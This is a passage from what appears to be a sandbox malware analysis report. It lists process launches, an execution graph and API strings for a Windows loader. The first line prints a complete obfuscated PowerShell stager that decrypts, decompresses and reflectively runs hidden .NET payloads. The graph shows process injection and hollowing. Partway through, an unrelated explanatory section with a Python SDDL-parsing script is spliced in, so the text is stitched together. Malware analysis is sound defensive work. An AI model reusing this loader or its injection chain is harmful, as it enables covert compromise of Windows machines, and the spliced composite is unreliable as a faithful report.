                                                Commandline:cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
                                                Imagebase:0x7ff77aae0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:35
                                                Start time:08:46:31
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell.exe -WindowStyle Hidden
                                                Imagebase:0x7ff741d30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:36
                                                Start time:08:46:31
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:37
                                                Start time:08:46:34
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:38
                                                Start time:08:46:34
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:39
                                                Start time:08:46:34
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:40
                                                Start time:08:46:35
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:41
                                                Start time:08:46:35
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:42
                                                Start time:08:46:36
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:43
                                                Start time:08:46:36
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:44
                                                Start time:08:46:36
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:45
                                                Start time:08:46:37
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\dllhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{29a28251-c10b-42e7-8393-a6c218333ff2}
                                                Imagebase:0x7ff7d8730000
                                                File size:21'312 bytes
                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:46
                                                Start time:08:46:38
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:47
                                                Start time:08:46:38
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:48
                                                Start time:08:46:39
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                                Imagebase:0x7ff62d520000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:49
                                                Start time:08:46:39
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:50
                                                Start time:08:46:39
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false


                                                  Execution Graph

                                                  Execution Coverage:44.2%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:72.9%
                                                  Total number of Nodes:251
                                                  Total number of Limit Nodes:30
                                                  execution_graph 527 1400036f4 528 140003701 527->528 530 140003721 ConnectNamedPipe 528->530 531 140003716 Sleep 528->531 537 140002300 AllocateAndInitializeSid 528->537 532 14000377f Sleep 530->532 533 140003730 ReadFile 530->533 531->528 535 14000378a DisconnectNamedPipe 532->535 534 140003753 WriteFile 533->534 533->535 534->535 535->530 538 14000241b 537->538 539 14000235d SetEntriesInAclW 537->539 538->528 539->538 540 1400023a1 LocalAlloc 539->540 540->538 541 1400023b5 InitializeSecurityDescriptor 540->541 541->538 542 1400023c5 SetSecurityDescriptorDacl 541->542 542->538 543 1400023dc CreateNamedPipeW 542->543 543->538 544 140003634 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 545 14000368a K32EnumProcesses 544->545 546 1400036e7 Sleep 545->546 547 14000369f 545->547 546->545 548 1400036d8 547->548 550 140003190 547->550 548->546 551 1400031a1 550->551 552 1400031c9 550->552 556 140001868 OpenProcess 551->556 552->547 555 140001868 31 API calls 555->552 557 140001cd1 556->557 558 1400018b0 IsWow64Process 556->558 557->555 559 1400018c7 CloseHandle 558->559 559->557 561 1400018ed 559->561 561->557 562 14000192f OpenProcess 561->562 562->557 563 14000194b OpenProcess 562->563 564 140001a04 NtQueryInformationProcess 563->564 565 14000196a K32GetModuleFileNameExW 563->565 566 140001cc8 CloseHandle 564->566 567 140001a29 564->567 568 1400019b3 CloseHandle 565->568 569 140001983 PathFindFileNameW lstrlenW 565->569 566->557 567->566 571 140001a33 OpenProcessToken 567->571 568->564 570 1400019c1 568->570 569->568 572 1400019a0 StrCpyW 569->572 570->564 573 1400019e0 StrCmpIW 570->573 571->566 574 140001a51 GetTokenInformation 571->574 572->568 573->566 573->570 575 140001af4 574->575 576 140001a79 GetLastError 574->576 578 140001afb CloseHandle 575->578 576->575 577 140001a84 LocalAlloc 576->577 577->575 579 140001a9a GetTokenInformation 577->579 578->566 583 140001b0f 578->583 580 140001ae2 579->580 581 
140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 579->581 582 140001ae9 LocalFree 580->582 581->582 582->578 583->566 584 140001b9f StrStrA 583->584 585 140001bc8 583->585 584->583 586 140001bcd 584->586 585->566 586->566 587 140001bf8 VirtualAllocEx 586->587 587->566 588 140001c27 WriteProcessMemory 587->588 588->566 589 140001c46 588->589 597 140002bfc 589->597 591 140001c66 591->566 592 140001c74 WaitForSingleObject 591->592 593 140001c83 GetExitCodeThread 592->593 594 140001cbd CloseHandle 592->594 595 140001ca2 VirtualFreeEx 593->595 596 140001c99 593->596 594->566 595->594 596->595 600 1400020cc GetModuleHandleA 597->600 601 1400020f5 600->601 602 1400020ec GetProcAddress 600->602 602->601 603 140002d38 606 140002d4c 603->606 651 140002a0c 606->651 609 140002a0c 14 API calls 610 140002d74 GetCurrentProcessId OpenProcess 609->610 611 140002d94 OpenProcessToken 610->611 612 140002e06 RegOpenKeyExW 610->612 613 140002da8 LookupPrivilegeValueW 611->613 614 140002dfd CloseHandle 611->614 615 140002e37 RegQueryValueExW 612->615 616 140002d41 ExitProcess 612->616 613->614 617 140002dbf AdjustTokenPrivileges 613->617 614->612 615->616 618 140002e67 RegQueryValueExW 615->618 617->614 619 140002df7 GetLastError 617->619 618->616 620 140002e97 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 618->620 619->614 620->616 621 140002f09 RegQueryValueExW 620->621 621->616 622 140002f39 RegCloseKey GetCurrentProcessId 621->622 665 14000200c GetProcessHeap HeapAlloc 622->665 624 140002f50 RegCreateKeyExW 625 14000304a CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 624->625 626 140002f8d ConvertStringSecurityDescriptorToSecurityDescriptorW 624->626 627 14000151c 50 API calls 625->627 628 140002fb5 RegSetKeySecurity LocalFree 626->628 629 140002fcf RegCreateKeyExW 626->629 632 1400030d4 627->632 628->629 630 140003009 GetCurrentProcessId RegSetValueExW RegCloseKey 629->630 631 140003040 RegCloseKey 629->631 630->631 631->625 633 140003112 
632->633 634 1400030e0 ShellExecuteW 632->634 635 14000148c 6 API calls 633->635 634->633 634->634 636 14000311a 635->636 637 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 636->637 638 140003123 637->638 639 14000148c 6 API calls 638->639 640 14000312c 639->640 641 14000148c 6 API calls 640->641 642 140003135 641->642 643 14000148c 6 API calls 642->643 644 14000313e 643->644 645 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 644->645 646 140003147 645->646 647 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 646->647 648 140003150 647->648 649 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 648->649 650 140003159 GetProcessHeap HeapFree SleepEx 649->650 650->616 652 140002a15 StrCpyW StrCatW GetModuleHandleW 651->652 653 140002bdf 651->653 652->653 654 140002a66 GetCurrentProcess K32GetModuleInformation 652->654 653->609 655 140002bd6 FreeLibrary 654->655 656 140002a96 CreateFileW 654->656 655->653 656->655 657 140002acb CreateFileMappingW 656->657 658 140002af4 MapViewOfFile 657->658 659 140002bcd CloseHandle 657->659 660 140002bc4 CloseHandle 658->660 661 140002b17 658->661 659->655 660->659 661->660 662 140002b30 lstrcmpiA 661->662 664 140002b6e 661->664 662->661 663 140002b70 VirtualProtect VirtualProtect 662->663 663->660 664->660 671 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 665->671 667 1400020a5 GetProcessHeap HeapFree 668 140002050 668->667 669 140002071 OpenProcess 668->669 669->668 670 140002087 TerminateProcess CloseHandle 669->670 670->668 672 140001e58 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 671->672 676 140001d7d 671->676 672->668 673 140001d92 OpenProcess 674 140001daf K32EnumProcessModulesEx 673->674 673->676 675 140001e43 CloseHandle 674->675 674->676 675->676 676->672 676->673 676->675 677 140001de9 ReadProcessMemory 676->677 678 140001e0b 677->678 678->675 678->676 678->677 679 140002cb0 681 140002cbd 679->681 680 140002300 6 API calls 680->681 681->680 682 
140002cd2 Sleep 681->682 683 140002cdd ConnectNamedPipe 681->683 682->681 684 140002d21 Sleep 683->684 685 140002cec ReadFile 683->685 686 140002d2c DisconnectNamedPipe 684->686 685->686 687 140002d0f 685->687 686->683 687->686 689 1400031d0 687->689 690 140003413 689->690 691 1400031f7 689->691 692 140003619 690->692 693 14000341f 690->693 694 140003355 ReadFile 691->694 695 1400031fd 691->695 700 140001f7c 22 API calls 692->700 696 1400035c9 693->696 697 14000342b 693->697 698 140003330 694->698 699 14000337f 694->699 701 140003209 695->701 702 14000334c ExitProcess 695->702 703 1400020fc ReadFile 696->703 704 140003434 697->704 705 140003515 697->705 698->687 699->698 706 14000338c GetProcessHeap HeapAlloc 699->706 700->698 701->698 712 1400032c2 ReadFile 701->712 713 140003227 701->713 707 1400035d8 703->707 708 1400034e4 704->708 709 140003440 704->709 777 1400020fc 705->777 710 140001cf0 13 API calls 706->710 707->698 719 1400020fc ReadFile 707->719 774 140002c5c 708->774 709->698 715 14000344c RegOpenKeyExW 709->715 732 1400033c5 710->732 712->698 723 1400032ec 712->723 713->698 717 140003230 GetProcessHeap HeapAlloc K32EnumProcesses 713->717 720 1400034b5 715->720 721 140003479 RegDeleteValueW RegDeleteValueW RegDeleteValueW 715->721 717->698 740 14000326e 717->740 726 1400035eb 719->726 761 14000217c SysAllocString SysAllocString CoInitializeEx 720->761 721->720 722 1400033fa GetProcessHeap HeapFree 722->698 723->698 733 140001868 31 API calls 723->733 724 14000352c ReadFile 724->698 728 140003554 724->728 726->698 730 1400035ef ShellExecuteW 726->730 728->698 734 140003561 GetProcessHeap HeapAlloc ReadFile 728->734 730->698 731 1400034c1 735 14000217c 9 API calls 731->735 732->722 736 1400033f5 732->736 737 1400033f3 732->737 738 140003312 733->738 734->722 739 1400035a5 734->739 741 1400034cd 735->741 753 140001eec 736->753 737->722 743 140001868 31 API calls 738->743 739->722 781 140002434 739->781 740->698 744 1400032bd 740->744 746 140001868 31 API 
calls 740->746 769 140001f7c GetProcessHeap HeapAlloc 741->769 743->744 744->698 746->740 754 140001f65 753->754 755 140001f0b OpenProcess 753->755 754->722 755->754 756 140001f23 755->756 757 140002bfc 2 API calls 756->757 758 140001f43 757->758 759 140001f5c CloseHandle 758->759 760 140001f51 CloseHandle 758->760 759->754 760->759 762 1400022d8 SysFreeString SysFreeString 761->762 763 1400021bd CoInitializeSecurity 761->763 762->731 764 140002205 CoCreateInstance 763->764 765 1400021f9 763->765 766 1400022d2 CoUninitialize 764->766 767 140002234 VariantInit 764->767 765->764 765->766 766->762 768 14000228a 767->768 768->766 770 140001cf0 13 API calls 769->770 771 140001fba 770->771 772 140001fe8 GetProcessHeap HeapFree 771->772 773 140001eec 5 API calls 771->773 773->771 775 1400020cc 2 API calls 774->775 776 140002c71 775->776 778 140002120 ReadFile 777->778 779 140002143 778->779 780 14000215d 778->780 779->778 779->780 780->698 780->724 782 14000246f 781->782 806 140002726 781->806 784 1400020cc 2 API calls 782->784 805 1400024ae 782->805 782->806 783 1400024d7 CreateProcessW 783->805 784->805 785 1400028e1 OpenProcess 786 1400028f1 TerminateProcess 785->786 785->805 786->805 787 1400020cc GetModuleHandleA GetProcAddress 787->805 788 140002566 VirtualAllocEx 790 140002595 WriteProcessMemory 788->790 788->805 789 14000273f VirtualAllocEx 791 14000276d WriteProcessMemory 789->791 789->805 792 1400025b7 VirtualProtectEx 790->792 790->805 793 14000278f VirtualProtectEx 791->793 791->805 792->805 793->805 794 140002858 VirtualAlloc 798 140002879 Wow64GetThreadContext 794->798 794->805 795 140002682 VirtualAlloc 797 1400026a7 GetThreadContext 795->797 795->805 796 1400027d0 WriteProcessMemory 796->805 800 1400026c4 WriteProcessMemory 797->800 797->805 801 140002891 WriteProcessMemory 798->801 798->805 799 1400025f9 WriteProcessMemory 799->805 802 1400026ef SetThreadContext 800->802 800->805 803 1400028b6 Wow64SetThreadContext 801->803 801->805 804 140002712 
ResumeThread 802->804 802->805 803->805 804->805 804->806 805->783 805->785 805->787 805->788 805->789 805->794 805->795 805->796 805->799 805->806 807 140002643 VirtualProtectEx 805->807 808 14000281a VirtualProtectEx 805->808 806->722 807->805 808->805

                                                  Callgraph

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                  • String ID: $nya-dll32$$nya-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\$nya-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                  • API String ID: 3658652915-3222643892
                                                  • Opcode ID: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
                                                  • Instruction ID: 4f21af1d6324345a54d8493184232a85d4bbe7b60dd5b863780ff56615b54280
                                                  • Opcode Fuzzy Hash: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
                                                  • Instruction Fuzzy Hash: A5C1F2B2200A4086EB26DF22F8547DA37A5FB8CBD9F414116FB4A43A76DF38C589C744
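The String ID list above contains an SDDL string, D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), and the execution graph shows ConvertStringSecurityDescriptorToSecurityDescriptorW followed by RegSetKeySecurity directly after a RegCreateKeyExW call, so the payload applies that DACL to a registry key it creates (the same function references SOFTWARE\$nya-config). The Python below is an added example, not code from the report or from the sample: it decodes the DACL part of an SDDL string into ACE type, inheritance flags, rights and trustee, and flags any trustee that every local user satisfies yet receives modify-class rights. Only the SDDL codes needed here are tabulated, and the "tight" comparison string is constructed for contrast, not a Windows default.

```python
import re

# Subset of the SDDL vocabulary (ACE types, flags, rights, well-known trustee aliases).
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT", "AL": "SYSTEM_ALARM"}
ACE_FLAGS = {"OI": "OBJECT_INHERIT", "CI": "CONTAINER_INHERIT", "NP": "NO_PROPAGATE_INHERIT",
             "IO": "INHERIT_ONLY", "ID": "INHERITED", "SA": "SUCCESSFUL_ACCESS", "FA": "FAILED_ACCESS"}
RIGHTS = {"GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
          "RC": "READ_CONTROL", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
          "KA": "KEY_ALL_ACCESS", "KR": "KEY_READ", "KW": "KEY_WRITE", "KX": "KEY_EXECUTE"}
TRUSTEES = {"AU": ("S-1-5-11", "Authenticated Users"), "BA": ("S-1-5-32-544", "Builtin Administrators"),
            "BU": ("S-1-5-32-545", "Builtin Users"), "SY": ("S-1-5-18", "Local System"),
            "WD": ("S-1-1-0", "Everyone"), "IU": ("S-1-5-4", "Interactive")}
# Trustees that any logged-on user on the machine matches.
BROAD_TRUSTEES = {"Authenticated Users", "Builtin Users", "Everyone", "Interactive"}
# Rights that let the holder change the key's data or its ACL.
MODIFY_RIGHTS = {"GENERIC_ALL", "GENERIC_WRITE", "WRITE_DAC", "WRITE_OWNER", "KEY_ALL_ACCESS", "KEY_WRITE"}

ACE_RE = re.compile(r"\(([^)]*)\)")
DACL_RE = re.compile(r"D:([^(]*)((?:\([^)]*\))+)")   # 'D:' + optional P/AR/AI flags + one or more ACEs


def _two_letter_tokens(field):
    """Flags and rights are concatenated two-character codes; rights may instead be a hex mask."""
    if field.startswith("0x"):
        return [field]
    return [field[i:i + 2] for i in range(0, len(field), 2)]


def parse_ace(text):
    """Parse one ACE 'type;flags;rights;object_guid;inherit_guid;trustee' into a dict."""
    parts = text.split(";")
    if len(parts) != 6:
        raise ValueError(f"malformed ACE: {text!r}")
    ace_type, flags, rights, _obj_guid, _inherit_guid, trustee = parts
    sid, name = TRUSTEES.get(trustee, (trustee, trustee))   # raw S-1-... SIDs pass through unchanged
    return {
        "type": ACE_TYPES.get(ace_type, ace_type),
        "flags": [ACE_FLAGS.get(f, f) for f in _two_letter_tokens(flags)],
        "rights": [RIGHTS.get(r, r) for r in _two_letter_tokens(rights)],
        "trustee": name,
        "sid": sid,
    }


def parse_dacl(sddl):
    """Return {'protected': bool, 'aces': [...]} for the D: section of an SDDL string, or None."""
    m = DACL_RE.search(sddl)
    if not m:
        return None
    dacl_flags, ace_block = m.groups()
    return {"protected": "P" in dacl_flags,           # P = protected, inheritance from the parent key is blocked
            "aces": [parse_ace(a) for a in ACE_RE.findall(ace_block)]}


def broad_modify_trustees(dacl):
    """Trustees that every local user can satisfy and that are granted modify-class rights."""
    return sorted(
        ace["trustee"]
        for ace in dacl["aces"]
        if ace["type"] == "ACCESS_ALLOWED"
        and ace["trustee"] in BROAD_TRUSTEES
        and MODIFY_RIGHTS & set(ace["rights"])
    )


# The SDDL string from the String ID list above.
SAMPLE_SDDL = "D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)"

# Constructed contrast (not from the report and not a Windows default): administrators and
# SYSTEM keep full access, ordinary users get read only, inheritance is blocked.
TIGHT_SDDL = "D:PAI(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;KR;;;BU)"

if __name__ == "__main__":
    for ace in parse_dacl(SAMPLE_SDDL)["aces"]:
        print(ace["type"], ace["trustee"], ace["sid"], ace["flags"], ace["rights"])
    print("broad modify access:", broad_modify_trustees(parse_dacl(SAMPLE_SDDL)))
```

The decoded sample DACL grants GENERIC_ALL, inherited by all subkeys and values, to Authenticated Users as well as to Builtin Administrators. In practice that means any local account, not just the elevated installer, can read and rewrite whatever the payload stores under that key; for hunting, an explicit Authenticated-Users-full-control ACE on a key under HKLM\SOFTWARE is itself an unusual artefact worth alerting on.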

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 45 140001868-1400018aa OpenProcess 46 140001cd1-140001ced 45->46 47 1400018b0-1400018c5 IsWow64Process 45->47 48 1400018d5 47->48 49 1400018c7-1400018d3 47->49 50 1400018db-1400018e7 CloseHandle 48->50 49->50 50->46 51 1400018ed-1400018f8 50->51 51->46 52 1400018fe-140001913 51->52 53 140001925 52->53 54 140001915-14000191a 52->54 56 140001927-140001929 53->56 54->46 55 140001920-140001923 54->55 55->56 56->46 57 14000192f-140001945 OpenProcess 56->57 57->46 58 14000194b-140001964 OpenProcess 57->58 59 140001a04-140001a23 NtQueryInformationProcess 58->59 60 14000196a-140001981 K32GetModuleFileNameExW 58->60 61 140001cc8-140001ccb CloseHandle 59->61 62 140001a29-140001a2d 59->62 63 1400019b3-1400019bf CloseHandle 60->63 64 140001983-14000199e PathFindFileNameW lstrlenW 60->64 61->46 62->61 66 140001a33-140001a4b OpenProcessToken 62->66 63->59 65 1400019c1-1400019db 63->65 64->63 67 1400019a0-1400019b0 StrCpyW 64->67 68 1400019e0-1400019f2 StrCmpIW 65->68 66->61 69 140001a51-140001a77 GetTokenInformation 66->69 67->63 68->61 70 1400019f8-140001a02 68->70 71 140001af4 69->71 72 140001a79-140001a82 GetLastError 69->72 70->59 70->68 74 140001afb-140001b09 CloseHandle 71->74 72->71 73 140001a84-140001a98 LocalAlloc 72->73 73->71 75 140001a9a-140001ac0 GetTokenInformation 73->75 74->61 76 140001b0f-140001b16 74->76 78 140001ae2 75->78 79 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 75->79 76->61 77 140001b1c-140001b27 76->77 77->61 80 140001b2d-140001b37 77->80 81 140001ae9-140001af2 LocalFree 78->81 79->81 82 140001b52 80->82 83 140001b39-140001b43 80->83 81->74 85 140001b56-140001b8e call 1400029a4 * 3 82->85 83->61 84 140001b49-140001b50 83->84 84->85 85->61 92 140001b94-140001bb4 call 1400029a4 